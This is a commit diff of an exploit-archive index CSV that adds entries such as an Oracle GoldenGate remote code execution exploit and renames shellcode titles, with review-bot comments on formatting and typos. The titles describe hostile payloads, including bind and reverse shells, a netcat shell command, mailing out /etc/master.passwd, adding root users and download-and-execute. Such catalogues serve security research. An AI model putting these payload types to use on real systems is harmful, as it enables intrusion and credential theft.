DB: 2017-05-10
10 new exploits LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution Crypttech CryptoLog - Remote Code Execution (Metasploit) BSD/x86 - portbind port 31337 Shellcode (83 bytes) BSD/x86 - portbind port random Shellcode (143 bytes) BSD/x86 - Portbind Port 31337 Shellcode (83 bytes) BSD/x86 - Portbind Random Port Shellcode (143 bytes) BSD/x86 - execve /bin/sh Crypt /bin/sh Shellcode (49 bytes) BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes) BSD/x86 - reverse 6969 portbind Shellcode (129 bytes) BSD/x86 - Portbind Reverse 6969 Shellcode (129 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 bytes) FreeBSD/x86 - portbind 4883 with auth Shellcode (222 bytes) FreeBSD/x86 - Portbind Port 4883 with Auth Shellcode (222 bytes) FreeBSD/x86 - connect (Port 31337) Shellcode (102 bytes) FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes) Linux/x86 - execve Null Free Shellcode (Generator) Linux/x86 - Portbind Payload Shellcode (Generator) Windows XP SP1 - Portbind Payload Shellcode (Generator) Linux/x86 - execve Null-Free Shellcode (Generator) Linux/x86 - Portbind Shellcode (Generator) Windows XP SP1 - Portbind Shellcode (Generator) Linux/x86 - cmd Null Free Shellcode (Generator) Linux/x86 - cmd Null-Free Shellcode (Generator) Cisco IOS - Connectback (Port 21) Shellcode Cisco IOS - Connectback Port 21 Shellcode Linux/MIPS (Linksys 
WRT54G/GL) - 4919 port bind Shellcode (276 bytes) Linux/MIPS (Linksys WRT54G/GL) - Bind Port 4919 Shellcode (276 bytes) Linux/SPARC - portbind port 8975 Shellcode (284 bytes) Linux/SPARC - Portbind Port 8975 Shellcode (284 bytes) Linux/x86 - 4444 Port Binding Shellcode (xor-encoded) (152 bytes) Linux/x86 - Binding Port 4444 Shellcode (xor-encoded) (152 bytes) Linux/x86 - bindport 8000 & execve iptables -F Shellcode (176 bytes) Linux/x86 - bindport 8000 & add user with root access Shellcode (225+ bytes) Linux/x86 - 8000 Bind Port ASM Code Linux Shellcode (179 bytes) Linux/x86 - Bind Port 8000 & Execve Iptables -F Shellcode (176 bytes) Linux/x86 - Bind Port 8000 & Add User with Root Access Shellcode (225+ bytes) Linux/x86 - Bind Port 8000 ASM Code Linux Shellcode (179 bytes) Linux/x86 - connect-back port UDP/54321 live packet capture Shellcode (151 bytes) Linux/x86 - append rsa key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Connectback Port 54321/UDP Live Packet Capture Shellcode (151 bytes) Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Connect Back Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - setuid/portbind (Port 31337) Shellcode (96 bytes) Linux/x86 - portbind (2707) Shellcode (84 bytes) Linux/x86 - setuid/portbind Port 31337 Shellcode (96 bytes) Linux/x86 - Portbind 2707 Shellcode (84 bytes) Linux/x86 - SET_PORT() portbind 31337/TCP Shellcode (100 bytes) Linux/x86 - SET_PORT() Portbind 31337/TCP Shellcode (100 bytes) Linux/x86 - Password Authentication portbind (64713) Shellcode (166 bytes) Linux/x86 - portbind (port 64713) Shellcode (86 bytes) Linux/x86 - Password Authentication Portbind 64713 Shellcode (166 bytes) Linux/x86 - Portbind Port 64713 Shellcode (86 bytes) Linux/x86 - portbind port 5074 toupper Shellcode (226 bytes) Linux/x86 - Add user 't00r' encrypt Shellcode (116 bytes) Linux/x86 - 
Portbind Port 5074 toupper Shellcode (226 bytes) Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes) Linux/x86 - portbind port 5074 Shellcode (92 bytes) Linux/x86 - portbind port 5074 + fork() Shellcode (130 bytes) Linux/x86 - Add user 't00r' Shellcode (82 bytes) Linux/x86 - Portbind Port 5074 Shellcode (92 bytes) Linux/x86 - Portbind Port 5074 + fork() Shellcode (130 bytes) Linux/x86 - Add User 't00r' Shellcode (82 bytes) Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes) Linux/x86-64 - Bindshell Port 4444 Shellcode (132 bytes) NetBSD/x86 - callback Shellcode (port 6666) (83 bytes) NetBSD/x86 - Callback Port 6666 Shellcode (83 bytes) OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes) OpenBSD/x86 - Portbind Port 6969 Shellcode (148 bytes) Solaris/SPARC - portbind (port 6666) Shellcode (240 bytes) Solaris/SPARC - Portbind Port 6666 Shellcode (240 bytes) Solaris/SPARC - portbind port 6789 Shellcode (228 bytes) Solaris/SPARC - Portbind Port 6789 Shellcode (228 bytes) Solaris/SPARC - portbinding Shellcode (240 bytes) Solaris/x86 - portbind/TCP Shellcode (Generator) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free Shellcode (39 bytes) Solaris/SPARC - Portbind Shellcode (240 bytes) Solaris/x86 - Portbind TCP Shellcode (Generator) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null-Free Shellcode (39 bytes) Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode Windows 5.0 < 7.0 x86 - Bind Shell Port 28876 Null-Free Shellcode Win32 - telnetbind by Winexec 23 port Shellcode (111 bytes) Win32 - Winexec Telnet Bind 23 Port Shellcode (111 bytes) Win32 XP SP2 FR - Sellcode cmd.exe Shellcode (32 bytes) Win32 XP SP2 (FR) - Sellcode cmd.exe Shellcode (32 bytes) Win32 - Download and Execute Shellcode (Generator) (Browsers Edition) (275+ bytes) Win32 - Download & Execute Shellcode (Generator) (Browsers Edition) (275+ bytes) Win32 - download and execute Shellcode (124 bytes) Win32 - Download & Execute Shellcode (124 bytes) Windows NT/2000/XP 
(Russian) - Add User _slim_ Shellcode (318 bytes) Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes) Windows XP - download and exec source Shellcode Windows XP SP1 - Portshell on port 58821 Shellcode (116 bytes) Windows XP - Download & Exec Shellcode Windows XP SP1 - Portshell Port 58821 Shellcode (116 bytes) Win64 - (URLDownloadToFileA) download and execute Shellcode (218+ bytes) Win64 - (URLDownloadToFileA) Download & Execute Shellcode (218+ bytes) Win32 XP SP3 - Add Firewall Rule to allow TCP traffic on port 445 Shellcode FreeBSD/x86 - portbind (Port 1337) Shellcode (167 bytes) Win32 XP SP3 - Add Firewall Rule to Allow TCP Traffic on Port 445 Shellcode FreeBSD/x86 - Portbind Port 1337 Shellcode (167 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes) Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes) Win32 XP SP2 FR - calc Shellcode (19 bytes) Win32 XP SP2 (FR) - calc Shellcode (19 bytes) Win32 XP SP3 English - cmd.exe Shellcode (26 bytes) Win32 XP SP2 Turkish - cmd.exe Shellcode (26 bytes) Win32 XP SP3 (English) - cmd.exe Shellcode (26 bytes) Win32 XP SP2 (Turkish) - cmd.exe Shellcode (26 bytes) Windows XP Home Edition SP2 English - calc.exe Shellcode (37 bytes) Windows XP Home Edition SP3 English - calc.exe Shellcode (37 bytes) Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Windows XP Professional SP2 ITA - calc.exe Shellcode (36 bytes) Windows XP Professional SP2 (ITA) - calc.exe Shellcode (36 bytes) Windows XP SP2 FR - Download and Exec Shellcode Windows XP SP2 (FR) - Download & Exec Shellcode Windows 7 Pro SP1 64 FR - (Beep) Shellcode (39 bytes) Windows 7 Professional SP1 x64 (FR) - (Beep) Shellcode (39 bytes) Linux/x86 - netcat connect back port 8080 
Shellcode (76 bytes) Linux/x86 - Netcat Connectback Port 8080 Shellcode (76 bytes) Linux/x86-64 - Add root user _shell-storm_ with password _leet_ Shellcode (390 bytes) Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86-64 - Add root user _shell-storm_ with password 'leet' Shellcode (390 bytes) Windows XP SP3 (SPA) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86 - bind shell port 64533 Shellcode (97 bytes) Linux/x86 - Bind Shell Port 64533 Shellcode (97 bytes) Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes) Linux - _nc -lp 31337 -e /bin//sh_ polymorphic Shellcode (91 bytes) Linux - 125 Bind Port 6778 XOR Encoded Polymorphic Shellcode (125 bytes) Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes) Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Linux/x86 - Netcat BindShell Port 8080 Shellcode (75 bytes) Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes) BSD/x86 - bindshell on port 2525 Shellcode (167 bytes) BSD/x86 - Bindshell Port 2525 Shellcode (167 bytes) Win32/XP SP3 (TR) - Add Admin _zrl_ Account Shellcode (127 bytes) Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes) Win32/XP Pro SP3 (EN) x86 - Add new local administrator _secuid0_ Shellcode (113 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337 Shellcode Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes) Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes) ARM - Bindshell Port 0x1337 Shellcode OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes) OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) Win32 - speaking Shellcode Win32 - Speaking 'You got pwned!' 
Shellcode BSD/x86 - 31337 portbind + fork Shellcode (111 bytes) BSD/x86 - 31337 Portbind + fork Shellcode (111 bytes) Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes) Linux/x86 - Netcat BindShell Port 6666 Shellcode (69 bytes) Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes) Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes) Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes) Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes) Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes) Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes) Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes) Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes) Windows RT ARM - Bind Shell (Port 4444) Shellcode Windows RT ARM - Bind Shell Port 4444 Shellcode Windows - Add Admin User _BroK3n_ Shellcode (194 bytes) Windows - Add Administrator 'BroK3n' Shellcode (194 bytes) Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User 'ALI' & Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind Port 4444/TCP Shellcode (81 bytes / 96 bytes with password) Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes) Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes) Windows x86 - Add Administrator 'ALI' & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator 'ALI' & Add 
ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows XP x86-64 - Download & execute Shellcode (Generator) Windows XP x86-64 - Download & Execute Shellcode (Generator) Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes) Linux/x86 - Bind Shell Port 33333/TCP Shellcode (96 bytes) Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes) Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes) OSX/x86-64 - /bin/sh Null Free Shellcode (34 bytes) OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes) OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes) OSX/x86-64 - Bind Port 4444/TPC Null-free Shellcode (144 bytes) Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes) Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes) Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes) Linux/x86-64 - Bindshell Port 31173 with Password Shellcode (92 bytes) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null-Free Shellcode (Python) (Generator) Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes) Linux/x86-64 - Bind Port 4444/TCP Shellcode (103 bytes) Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes) Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null-Free Shellcode (96 bytes) Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes) Linux/x86-64 - Bindshell Port 5600 Shellcode (81 bytes) Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes) Linux/x86-64 - Bindshell Port 5600 Shellcode (86 bytes) Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes) Linux/x86 - Bind Port 1472/TCP (IPv6) 
Shellcode (1250 bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes) Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes) Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes) Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes) Linux/x86 - Netcat Bind Shellcode with Port (44 / 52 bytes) Linux/x86 - zsh Bind Port 9090/TCP Shellcode (96 bytes) Linux/x86 - zsh Reverse Port 9090/TCP Shellcode (80 bytes) Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes) Linux/x86-64 - Bind Port 5600/TCP - Shellcode (87 bytes) LogRhythm Network Monitor - Authentication Bypass / Command Injection I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting
parent
6f37b94a66
commit
4e3947178d
12 changed files with 1133 additions and 110 deletions
229
files.csv
@ -5485,6 +5485,10 @@ id,file,description,date,author,platform,type,port
41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0
41974,platforms/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111
41981,platforms/android/dos/41981.txt,"LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls",2017-05-09,"Google Security Research",android,dos,0
41982,platforms/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",android,dos,0
41983,platforms/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflows",2017-05-09,"Google Security Research",android,dos,0
41984,platforms/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15487,6 +15491,9 @@ id,file,description,date,author,platform,type,port
41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80
41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22
41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo and niklasb",macos,remote,0
41975,platforms/windows/remote/41975.txt,"Microsoft Windows 8 / 8.1 / 10 / Windows Server / SCEP_ Microsoft Security Essentials - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
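Review bot: the port column for the new row 41978 (Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution) is 0, whereas the neighbouring remote entries 41935 and 41980 record their service port (80); if the GoldenGate manager port is known, fill it in here so the entry can be matched against scan results like the others in this section. The `SCEP_` in the 41975 description follows the file's existing underscore-for-comma convention (compare `execve(_/bin/sh___/bin/sh__0)` in the unchanged row 14113) and needs no change.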
@ -15495,14 +15502,14 @@ id,file,description,date,author,platform,type,port
13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - portbind port random Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Portbind Port 31337 Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Portbind Random Port Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt /bin/sh Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - reverse 6969 portbind Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Portbind Reverse 6969 Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0
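Review bot: the renames of 13248 and 13249 move to the title-cased 'Portbind Port 31337' / 'Portbind Random Port' form, but the unchanged context row 13245 two lines above still reads 'setuid/portbind 31337/TCP'; if the goal of this commit is to normalise the shellcode titles, 13245 should be brought in line in the same change rather than left for a later pass. Also, 13256's new title 'Portbind Reverse 6969' drops the word 'Port' that the other renames in this hunk keep; 'Portbind Reverse Port 6969' would match the 'Portbind Port 31337' pattern used for 13248.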
@ -15511,11 +15518,11 @@ id,file,description,date,author,platform,type,port
13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0
13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect_ recv_ jmp_ return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - reverse portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - encrypted Shellcode /bin/sh (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - portbind 4883 with auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Portbind Port 4883 with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0
13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0
13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0
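Review bot: the new title for 13267 contains a typo, 'FreeBSD/x86 - Rortbind Reverse 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)'; it should read 'Portbind Reverse ...' (or 'Reverse Portbind ...', closer to the original wording), otherwise anyone searching the CSV for 'portbind' will no longer find this entry. The 13266 rename ('Null Free' to 'Null-Free') is consistent with the other Null-Free renames in this commit and looks fine.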
@ -15523,25 +15530,25 @@ id,file,description,date,author,platform,type,port
13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0
13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 _ chmod 6755 & execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0
13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0
13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - connect (Port 31337) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0
13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0
13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0
13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Shellcode Encoding Tool (Generator)",2005-12-16,Skylined,generator,shellcode,0
13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback (Port 21) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
